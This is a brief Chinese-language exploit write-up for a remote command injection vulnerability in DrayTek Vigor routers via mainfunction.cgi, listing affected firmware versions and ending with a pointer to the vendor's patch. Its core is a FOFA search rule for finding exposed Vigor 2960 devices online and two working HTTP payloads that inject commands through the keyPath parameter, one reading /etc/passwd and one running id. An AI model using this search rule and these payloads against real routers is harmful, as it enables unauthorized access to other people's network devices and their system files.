一、漏洞描述
DrayTek Vigor是一种路由器。
DrayTek Vigor中存在一个远程命令注入漏洞,攻击者可利用该漏洞通过在mainfunction.cgi中包含格式错误的查询字符串的精心编制的HTTP消息,让远程恶意用户执行任意代码。
二、影响版本
DrayTek Vigor3900 1.5.1.3
DrayTek Vigor2960 1.5.1.3
DrayTek Vigor300B 1.5.1.3
三、环境搭建
FOFA规则:title=”Vigor 2960”
三、漏洞复现
执行payload:
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}/etc/passwd%26ls%0A%27&loginUser=a&loginPwd=a
执行payload:
action=login&keyPath=%27%0Aid%0A%27&loginUser=a&loginPwd=a
四、修复建议
厂商已发布了漏洞修复程序,请及时关注更新:https://www.draytek.com/